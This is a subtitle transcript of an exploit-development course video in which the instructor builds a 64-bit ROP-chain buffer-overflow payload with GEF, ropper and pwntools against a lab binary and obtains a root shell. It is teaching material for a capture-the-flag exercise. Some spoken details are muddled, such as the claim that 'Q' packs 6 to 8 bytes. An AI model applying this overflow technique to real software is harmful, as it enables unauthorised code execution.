1
00:00:00,210 --> 00:00:02,880
All right, so welcome back to Introduction to Exploit Development.

2
00:00:02,920 --> 00:00:03,810
Let me check this course.

3
00:00:04,019 --> 00:00:05,040
Yes, it is.

4
00:00:05,550 --> 00:00:06,090
All right.

5
00:00:06,090 --> 00:00:13,860
So we're going to go for two one, which is basically, if you read the write-up I have on Google Docs,

6
00:00:13,950 --> 00:00:19,500
it's actually using a system call from the show_date function.

7
00:00:21,420 --> 00:00:23,400
Let me see if I have the source code.

8
00:00:24,240 --> 00:00:27,180
Open source code.

9
00:00:28,770 --> 00:00:29,760
Oh, there we go.

10
00:00:31,920 --> 00:00:32,700
Yes.

11
00:00:33,780 --> 00:00:36,030
So, show_date.

12
00:00:39,210 --> 00:00:47,690
So we're calling the show_date function, and it has a system-level command, and it runs date.

13
00:00:47,700 --> 00:00:54,060
So the vulnerability is that we have to overflow the buffer, take control of the return instruction pointer

14
00:00:54,060 --> 00:01:00,870
and do a ROP chain to be able to call this call right here.

15
00:01:01,170 --> 00:01:12,600
So first, I want you to go back and I want you to open the debugger, using the debugger to load it with dash

16
00:01:12,600 --> 00:01:13,110
q.

17
00:01:15,240 --> 00:01:24,000
So as you can see, we're using GEF; we're not using, we're not using the old debugger extension anymore.

18
00:01:24,120 --> 00:01:26,550
It's no longer supported.

19
00:01:27,000 --> 00:01:33,720
And I want you to disassemble this function right here.

20
00:01:34,410 --> 00:01:37,050
So disassemble show_date.

21
00:01:38,130 --> 00:01:43,740
And I want you to take note of this memory address right here.

22
00:01:44,550 --> 00:01:49,230
So this is the procedure, the procedure linkage table (PLT) entry.

23
00:01:50,160 --> 00:01:51,870
It makes a call to system.

24
00:01:54,270 --> 00:01:57,580
And normally, this is what I dragged out of the call.
25
00:01:57,600 --> 00:02:00,570
So now we disassemble this memory address.

26
00:02:03,360 --> 00:02:09,240
Now normally this is your GOT entry, which is your global offset table entry.

27
00:02:09,990 --> 00:02:18,780
So how dynamically linked, ASLR-protected binaries work is that they use a method called lazy linking,

28
00:02:18,780 --> 00:02:26,190
which means it doesn't actually know where the system call is until you run it the first time.

29
00:02:26,310 --> 00:02:32,430
And then once it does that, once you run it for the first time, it resolves the address.

30
00:02:32,550 --> 00:02:40,230
So I know that this is the exact same memory address as this, but in many cases that you'll see out

31
00:02:40,230 --> 00:02:42,270
in the wild, this is not going to be the same.

32
00:02:42,270 --> 00:02:45,900
So be aware that you need to copy the memory address

33
00:02:46,080 --> 00:02:47,250
that's right here,

34
00:02:47,250 --> 00:02:48,960
that makes the system call.

35
00:02:53,790 --> 00:02:57,780
So let's take this and add an entry to our exploit script.

36
00:02:58,830 --> 00:03:03,000
So let's say attempt2.py.

37
00:03:03,780 --> 00:03:05,490
Let's call it sys call.

38
00:03:11,670 --> 00:03:15,990
And we also have a hardcoded shell in memory.

39
00:03:15,990 --> 00:03:19,730
So what we want to do is go back to GEF.

40
00:03:19,740 --> 00:03:24,840
So we're going to use the GEF features, or GEF... actually, we want to use the GEF features now.

41
00:03:27,540 --> 00:03:27,990
I'm sorry.

42
00:03:27,990 --> 00:03:31,920
I'm just looking at the write-up and just multitasking.

43
00:03:32,340 --> 00:03:33,030
Let's see.

44
00:03:33,840 --> 00:03:37,140
So we're going to look for a search-pattern

45
00:03:40,350 --> 00:03:41,040
shell.

46
00:03:43,100 --> 00:03:43,820
Oh, right.

47
00:03:43,910 --> 00:03:50,300
So what I'll press is, we're going to Ctrl-C out of it and then we run search-pattern
48
00:03:50,310 --> 00:03:56,870
shell. So there's a lot of things that start with the word shell.

49
00:03:57,530 --> 00:04:04,220
What's relevant is not what's within this outer range, which is actually libc, the C standard library,

50
00:04:04,280 --> 00:04:12,110
but we go all the way up, into the binary range of our initialized binary, which is

51
00:04:12,110 --> 00:04:13,580
going to be this memory address.

52
00:04:13,610 --> 00:04:17,100
If you don't know what I'm talking about, let's go back now and type vmmap.

53
00:04:17,870 --> 00:04:27,350
So we want to search within this, starting from this address, ending at this address right here.

54
00:04:28,160 --> 00:04:33,920
So we're going to look for a shell function within this memory address range.

55
00:04:35,300 --> 00:04:40,520
So we go up and this is our shell function.

56
00:04:40,970 --> 00:04:45,350
As you can see, the next byte, or next two bytes, is going to be 2F, then B.

57
00:04:45,620 --> 00:04:47,990
So this is the beginning of the shell function.

58
00:04:47,990 --> 00:04:55,310
So we're going to take note of this: shell equals this memory address.

59
00:05:01,380 --> 00:05:03,330
Finally, we're going to go into ropper.

60
00:05:03,780 --> 00:05:05,580
So we're going to try ropper.

61
00:05:06,870 --> 00:05:07,280
All right.

62
00:05:07,410 --> 00:05:07,710
Sorry.

63
00:05:07,770 --> 00:05:11,610
That's the wrong container. There we go.

64
00:05:12,090 --> 00:05:12,850
Let's see if this works.

65
00:05:12,870 --> 00:05:13,830
Split the screen.

66
00:05:13,860 --> 00:05:22,470
We're going to do ropper --file on the binary, and we need to look for our final gadgets.

67
00:05:23,280 --> 00:05:31,080
So I want you to search for a pop rdi; ret, which, as you know from the previous 64-bit calling conventions,

68
00:05:31,140 --> 00:05:38,940
starts with the rdi register, then the rsi register, then the rdx register and then the rcx register

69
00:05:38,940 --> 00:05:41,850
for 64-bit calling conventions.
70
00:05:42,240 --> 00:05:46,260
So we're going to look for, search, step one, ret.

71
00:05:47,250 --> 00:05:52,380
I'll copy this memory address; ret equals this.

72
00:05:54,810 --> 00:05:59,100
And then we're going to use search for pop rdi.

73
00:06:00,120 --> 00:06:04,020
And we conveniently have a pop rdi; ret address right here.

74
00:06:06,180 --> 00:06:08,040
pop rdi; ret.

75
00:06:15,900 --> 00:06:20,210
So at this point it's just another rinse-and-repeat kind of attack.

76
00:06:20,220 --> 00:06:26,190
So it's going to be buf = b"A" * 208.

77
00:06:26,190 --> 00:06:36,810
Remember, take note of this: overwrite return base pointer. buf += b"\x42", that's hexadecimal

78
00:06:36,810 --> 00:06:48,930
for B, times eight: overwrite return stack pointer. The next bytes overwrite the return instruction

79
00:06:48,930 --> 00:06:52,140
pointer, and that's where we're going to land our ROP chain.

80
00:06:53,040 --> 00:07:02,160
So what we're going to do is buf += pack64(ret), and if I didn't document this before, what we're

81
00:07:02,160 --> 00:07:10,280
going to do is, it's actually the same convenience as last time, from pwn import *.

82
00:07:10,290 --> 00:07:22,680
I'm sorry, we're using pwntools now, so it's just another way of saying struct.pack, pack little-endian,

83
00:07:24,570 --> 00:07:25,170
ret.

84
00:07:25,770 --> 00:07:30,990
Or we could have just copied this memory address right here, just like that.

85
00:07:36,230 --> 00:07:42,350
So our next gadget is buf += pack64.

86
00:07:43,700 --> 00:07:45,740
Oh, actually, I'm sorry, 64.

87
00:07:45,770 --> 00:07:48,450
This is a 32-bit.

88
00:07:48,470 --> 00:07:49,700
You have to put a Q.

89
00:07:49,730 --> 00:07:50,420
I'm sorry.

90
00:07:52,710 --> 00:07:55,080
So struct.pack Q, ret.

91
00:07:56,730 --> 00:08:02,760
So in our previous video I said capital L; capital L just means 32-bit.
92
00:08:03,120 --> 00:08:05,490
And capital Q means 64-bit.

93
00:08:05,700 --> 00:08:09,780
So capital L is a memory address of four bytes.

94
00:08:09,780 --> 00:08:14,040
Capital Q is a memory address of 6 to 8 bytes.

95
00:08:14,130 --> 00:08:21,030
Because in 64-bit computing, we don't actually use all 64 bits.

96
00:08:21,030 --> 00:08:24,750
We use somewhere between 48 to 64 bits.

97
00:08:24,750 --> 00:08:26,850
So that means 6 to 8 bytes.

98
00:08:27,990 --> 00:08:33,539
So now we're going to do our pop rdi; ret address.

99
00:08:35,890 --> 00:08:38,890
buf += p64(

100
00:08:40,990 --> 00:08:46,080
shell). buf += p64(

101
00:08:47,170 --> 00:08:47,950
sys call).

102
00:08:51,230 --> 00:08:53,750
And then we write back out our buffer.

103
00:08:59,310 --> 00:09:05,820
So all it does is, you can even pipe the payload back into, like, a text file or something and then just have

104
00:09:05,820 --> 00:09:06,510
it read.

105
00:09:07,530 --> 00:09:12,750
So what we can do is we just copy all of this.

106
00:09:13,400 --> 00:09:14,820
I'm sorry about the previous video.

107
00:09:14,820 --> 00:09:17,640
I didn't actually document that very well,

108
00:09:21,420 --> 00:09:23,140
but now we're going to open another screen.

109
00:09:23,160 --> 00:09:29,040
So, Ctrl-B, Shift-5, then open attempt2.py.

110
00:09:34,280 --> 00:09:36,830
And once again, to pop the root shell,

111
00:09:36,830 --> 00:09:38,510
we're going to run the command

112
00:09:38,690 --> 00:09:40,470
python3 att...

113
00:09:40,550 --> 00:09:41,030
Oops.

114
00:09:41,750 --> 00:09:53,000
python3 attempt2.py, semicolon, semicolon, pipe two.

115
00:09:54,380 --> 00:09:55,250
Once again.

116
00:09:55,250 --> 00:10:05,780
So right now it executed date, as you can see from our source code of two. Press

117
00:10:05,780 --> 00:10:06,680
Enter again.

118
00:10:07,730 --> 00:10:10,520
id, whoami?

119
00:10:12,500 --> 00:10:13,230
root.
120
00:10:13,850 --> 00:10:14,270
flag

121
00:10:14,570 --> 00:10:15,350
.txt.

122
00:10:18,020 --> 00:10:19,700
And we could have read the flag.

123
00:10:19,700 --> 00:10:24,680
But I am not going to reveal the flag until our very last video, which is going to be the answer for

124
00:10:24,680 --> 00:10:25,460
your quiz.